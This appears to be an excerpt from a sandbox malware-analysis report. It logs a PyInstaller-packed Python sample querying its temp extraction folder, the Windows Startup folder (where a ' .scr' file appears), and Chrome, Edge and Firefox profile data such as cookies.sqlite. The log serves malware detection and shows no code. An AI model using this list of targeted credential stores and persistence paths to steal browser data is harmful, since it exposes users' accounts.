              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
